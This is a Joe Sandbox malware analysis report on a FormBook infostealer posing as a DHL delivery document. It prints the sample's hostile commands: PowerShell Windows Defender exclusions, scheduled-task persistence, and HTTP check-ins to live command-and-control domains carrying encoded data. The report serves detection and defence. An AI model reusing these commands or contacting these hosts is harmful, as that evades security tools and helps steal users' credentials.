Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL_Delivery Documents.exe

Overview

General Information

Sample name:DHL_Delivery Documents.exe
Analysis ID:1446732
MD5:9c930da2ac186c1f945a7bc74aa491ed
SHA1:3b24459060ab8590b7c550d34bd0243cbade3e2a
SHA256:25bbd4a45d4d02d8bacdf482696505ab302ad8591b5e06da57481f7098324f9e
Tags:DHLexeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DHL_Delivery Documents.exe (PID: 2656 cmdline: "C:\Users\user\Desktop\DHL_Delivery Documents.exe" MD5: 9C930DA2AC186C1F945A7BC74AA491ED)
    • powershell.exe (PID: 2108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7220 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4204 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DHL_Delivery Documents.exe (PID: 7184 cmdline: "C:\Users\user\Desktop\DHL_Delivery Documents.exe" MD5: 9C930DA2AC186C1F945A7BC74AA491ED)
      • OoIHIwIlaOHZFTFWeSHYCjEJ.exe (PID: 6460 cmdline: "C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setx.exe (PID: 7876 cmdline: "C:\Windows\SysWOW64\setx.exe" MD5: 5B700BC00E451033B2F9EEF349A91D1C)
          • OoIHIwIlaOHZFTFWeSHYCjEJ.exe (PID: 1352 cmdline: "C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8188 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • YybGLWQSx.exe (PID: 7204 cmdline: C:\Users\user\AppData\Roaming\YybGLWQSx.exe MD5: 9C930DA2AC186C1F945A7BC74AA491ED)
    • schtasks.exe (PID: 7360 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YybGLWQSx.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" MD5: 9C930DA2AC186C1F945A7BC74AA491ED)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2e083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17682:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2abf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x141ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.2.DHL_Delivery Documents.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          8.2.DHL_Delivery Documents.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d283:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          8.2.DHL_Delivery Documents.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            8.2.DHL_Delivery Documents.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17682:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ProcessId: 2108, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ProcessId: 2108, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YybGLWQSx.exe, ParentImage: C:\Users\user\AppData\Roaming\YybGLWQSx.exe, ParentProcessId: 7204, ParentProcessName: YybGLWQSx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp", ProcessId: 7360, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", ProcessId: 4204, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ProcessId: 2108, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", ProcessId: 4204, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:05/23/24-20:29:06.154524
            SID:2855465
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeReversingLabs: Detection: 55%
            Multi AV Scanner detection for submitted file
            Source: DHL_Delivery Documents.exeReversingLabs: Detection: 55%
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: DHL_Delivery Documents.exeJoe Sandbox ML: detected
            Source: DHL_Delivery Documents.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: DHL_Delivery Documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3278494163.000000000060E000.00000002.00000001.01000000.0000000A.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3278640060.000000000060E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL_Delivery Documents.exe, DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setx.pdbGCTL source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: setx.pdb source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JeWB.pdbSHA256 source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
            Source: Binary string: JeWB.pdb source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0042BF20 FindFirstFileW,FindNextFileW,FindClose,18_2_0042BF20
            Source: C:\Windows\SysWOW64\setx.exeCode function: 4x nop then xor eax, eax18_2_00419720
            Source: C:\Windows\SysWOW64\setx.exeCode function: 4x nop then pop edi18_2_0041E19F

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49710 -> 103.48.135.8:80
            Source: Joe Sandbox ViewIP Address: 172.67.214.17 172.67.214.17
            Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI HTTP/1.1Host: www.uzonedich.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI HTTP/1.1Host: www.alexbruma.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.bookingshop01.top
            Source: global trafficDNS traffic detected: DNS query: www.uzonedich.com
            Source: global trafficDNS traffic detected: DNS query: www.7egiy1.cfd
            Source: global trafficDNS traffic detected: DNS query: www.alexbruma.com
            Source: global trafficDNS traffic detected: DNS query: www.prospin.click
            Source: unknownHTTP traffic detected: POST /0eyj/ HTTP/1.1Host: www.alexbruma.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.alexbruma.comReferer: http://www.alexbruma.com/0eyj/Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 204User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 34 4c 59 49 55 62 6c 2b 4f 75 68 73 49 46 72 5a 6e 71 36 4b 41 32 48 55 36 72 35 44 2f 69 49 53 46 6d 58 69 49 31 77 36 4d 50 6a 6f 4d 4f 6e 68 7a 6b 75 61 67 61 30 37 72 71 65 52 55 6e 43 49 5a 58 2b 4c 30 2f 2b 77 78 31 63 45 69 31 4d 66 5a 72 52 55 34 77 70 51 71 64 52 63 58 71 6d 54 51 64 4b 62 43 6d 73 4f 50 48 6b 6c 66 63 33 6c 64 78 75 4f 6f 31 58 62 55 74 52 4a 42 65 76 31 2b 53 55 6b 4e 72 53 66 78 45 52 63 70 30 58 75 38 77 63 4f 55 42 46 4e 41 36 30 63 51 52 4f 53 4f 76 33 7a 31 37 56 4c 6a 63 75 4a 68 4f 6f 4e 52 59 4b 70 63 43 72 57 41 52 34 3d Data Ascii: Urf=8ZkltrS4BEEM4LYIUbl+OuhsIFrZnq6KA2HU6r5D/iISFmXiI1w6MPjoMOnhzkuaga07rqeRUnCIZX+L0/+wx1cEi1MfZrRU4wpQqdRcXqmTQdKbCmsOPHklfc3ldxuOo1XbUtRJBev1+SUkNrSfxERcp0Xu8wcOUBFNA60cQROSOv3z17VLjcuJhOoNRYKpcCrWAR4=
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 23 May 2024 18:29:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 18:29:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTDzKzRHGF6T7c3wPmmJUP2aLUqZYFsOZH7jrvhqEFg4rJXjwQjj0XGOOna9U8sTe6Jfo2gh2biqAlIveAApqbQ8W65HFqOR1o9%2BqFbFwKlsqfbziKo4ndIRZW%2BAJVQIb8%2B3hA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88871ca27ba97cac-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 